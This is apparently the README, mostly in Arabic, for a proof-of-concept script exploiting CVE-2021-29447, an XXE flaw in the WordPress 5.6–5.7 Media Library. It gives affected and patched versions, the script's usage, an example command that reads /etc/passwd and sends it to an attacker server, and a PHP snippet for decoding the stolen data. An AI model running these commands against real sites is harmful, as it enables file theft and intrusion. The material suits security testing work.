
برهان مفهوم لاستغلال ثغرة في مكتبة الوسائط في ووردبريس 5.6
╔═╗╦ ╦╔═╗
║ ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023
═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════
CVE-2021-29447: يمكن للمستخدم الذي لديه القدرة على رفع الملفات (مثل المؤلف) استغلال مشكلة في تحليل XML في مكتبة الوسائط مما يؤدي إلى هجمات XXE. يتطلب ذلك تثبيت ووردبريس باستخدام PHP 8. يمكن الوصول إلى الملفات الداخلية في هجوم XXE ناجح. تم إصلاح هذا في إصدار ووردبريس 5.7.1، إلى جانب الإصدارات المتأثرة الأقدم عبر إصدار ثانوي.
هذا النص البرمجي سهل الفهم والتشغيل وسيقوم بأتمتة الخطوات اللازمة لاستغلال هجوم XXE على مكتبة وسائط ووردبريس.
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]
options:
-h, --help show this help message and exit
-l LHOST, --lhost LHOST your server ip address e.g. 10.0.2.15
-p PORT, --port PORT your server port e.g. 1337
-f FILE, --file FILE system file to read e.g. /etc/passwd
مثال:
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd
لفك تشفير base64 استخدم/قم بتشغيل مقتطف PHP التالي:
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
$ php decode.php